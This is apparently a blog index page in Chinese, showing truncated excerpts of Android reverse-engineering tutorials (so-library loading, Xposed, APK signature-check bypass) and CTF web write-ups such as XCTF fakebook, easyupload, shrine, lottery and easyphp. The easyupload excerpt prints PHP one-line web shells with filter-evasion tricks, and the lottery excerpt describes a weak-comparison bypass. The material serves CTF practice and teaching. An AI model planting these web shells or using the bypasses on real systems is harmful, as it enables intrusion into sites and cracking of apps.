Android逆向8-so层逆向知识
Android逆向8-so层逆向知识来自吾爱破解-正己 https://www.52pojie.cn/thread-1701353-1-1.html down.52pojie.cn so加载流程作用:反调试、脱壳、注入等  函数的基本介绍:    函数名 描述    android_dlopen_ext() 、dlopen()、do_dlopen() 这三个函数主要用于加载库文件。android_dlopen_ext 是系统的一个函数,用于在运行时动态加载共享库。与标准的 dlopen() 函数相比,android_dlopen_ext 提供了更多的参数选项和扩展功能,例如支持命名空间、符号版本等特性。   find_library() find_library() 函数用于查找库,基本的用途是给定一个库的名字,然后查找并返回这个库的路径。   call_constructors() call_constructors()...
Android逆向7-Native逆向
Android逆向7-Native逆向来自吾爱破解-正己 https://www.52pojie.cn/thread-1701353-1-1.html NDK(Native Development...
Android逆向6-XPosed
Android逆向6-XPosed来自吾爱破解-正己 https://www.52pojie.cn/thread-1701353-1-1.html Xposed简介Xposed是一款可以在不修改APK的情况下影响程序运行的框架,基于它可以制作出许多功能强大的模块,且在功能不冲突的情况下同时运作。在这个框架下,我们可以编写并加载自己编写的插件APP,实现对目标apk的注入拦截等。 原理: 用自己实现的app_process替换掉了系统原本提供app_process,加载一个额外的jar包,入口从原来的: com.android.internal.osZygoteInit.main()被替换成了:...
Android逆向5-签名校验&smail
Android逆向5-签名校验&smail来自吾爱破解-正己 https://www.52pojie.cn/thread-1701353-1-1.html  了解APK文件签名 了解APK常见校验及校验对抗方法 了解PM代{过}{滤}理和IO重定向 smali语法之赋值  校验 常见的校验有:签名校验(最常见)、dexcrc校验、apk完整性校验、路径文件校验等 APK签名通过对 Apk 进行签名,开发者可以证明对 Apk 的所有权和控制权,可用于安装和更新其应用。而在 Android 设备上的安装 Apk ,如果是一个没有被签名的 Apk,则会被拒绝安装。在安装 Apk 的时候,软件包管理器也会验证 Apk 是否已经被正确签名,并且通过签名证书和数据摘要验证是否合法没有被篡改。只有确认安全无篡改的情况下,才允许安装在设备上。 简单来说,APK 的签名主要作用有两个:  证明 APK 的所有者。 允许 Android 市场和设备校验 APK 的正确性。  Android 目前支持以下四种应用签名方案: v1 方案:基于 JAR 签名。 v2 方案:APK 签名方案...
攻防世界36-fakebook-CTFWeb
攻防世界36-fakebook-CTFWeb没发现什么,随便join发现blog有过滤,dirsearch扫描一下,发现robots.txt,和flag.php(不能直接看),发现源码泄露,下载得源码: 1234567891011121314151617181920212223242526272829303132333435363738<?phpclass UserInfo{    public $name = "";    public $age = 0;    public $blog = "";    public function __construct($name, $age, $blog)    {        $this->name = $name;        $this->age = (int)$age;        $this->blog = $blog;    }    function get($url){        $ch =...
攻防世界35-easyupload-CTFWeb
攻防世界35-easyupload-CTFWeb通过各种上传发现,过滤了php后缀和内容中有php的文件 有这几种方式上传一句话木马 123<script language="php">eval($_POST[1]);</script><?php eval($_POST['cmd']);?><?= eval($_POST['cmd']);?>  那么如果过滤php的话只能用最后一种方式 上传时也要注意Content-Type: text/jpg 上传名称后缀为.phtml .phps .php5...
2025 UCSC CTF WriteUp
2025 UCSC CTF wp  Reverseeasy_re-ucsc简单异或 1234enc = '''n=<;:h2<'?8:?'9hl9'h:l>'2>>2>hk=>;:?'''for i in range(0,len(enc)):    print(chr(ord(enc[i]) ^ 10),end='')  flag{d7610b86-5205-3bf3-b0f4-84484ba74105} EZ_debug-ucscdebug能看结果,下断点道最后就行,直接看 123for i in range(0,len(enc)):    print(chr(enc[i]),end='')  flag{709e9bdd-0858-9750-8c37-9b135b31f16d} simplere-ucsc...
攻防世界34-shrine-CTFWeb
攻防世界34-shrine-CTFWeb123456789101112131415161718192021222324252627import flaskimport osapp = flask.Flask(__name__)app.config['FLAG'] = os.environ.pop('FLAG')@app.route('/')def index():    return open(__file__).read()@app.route('/shrine/<path:shrine>')def shrine(shrine):    def safe_jinja(s):        s = s.replace('(', '').replace(')', '')        blacklist = ['config', 'self']        return...
攻防世界33-lottery-CTFWeb
攻防世界33-lottery-CTFWeb 规则就是2个相同的数字赢5块…. flag是要9990000买到的,初始账户只有20,买一次2块  先注册  看看源码试试 源码中api.php里有buy方法  我么发现了随机生成的win_number[i]呵numbers[i]是弱比较,能不能绕过呢? 如果是输入true肯定跟1,2是==的 抓包看看  改成这  刷钱就行买到了  
攻防世界32-easyphp-CTFWeb
攻防世界32-easyphp-CTFWeb1234567891011121314151617181920212223242526272829303132333435363738394041<?phphighlight_file(__FILE__);$key1 = 0;$key2 = 0;$a = $_GET['a'];$b = $_GET['b'];if(isset($a) && intval($a) > 6000000 && strlen($a) <= 3){    if(isset($b) && '8b184b' === substr(md5($b),-6,6)){        $key1 = 1;     }else{            die("Emmm...再想想");    }}else{   ...






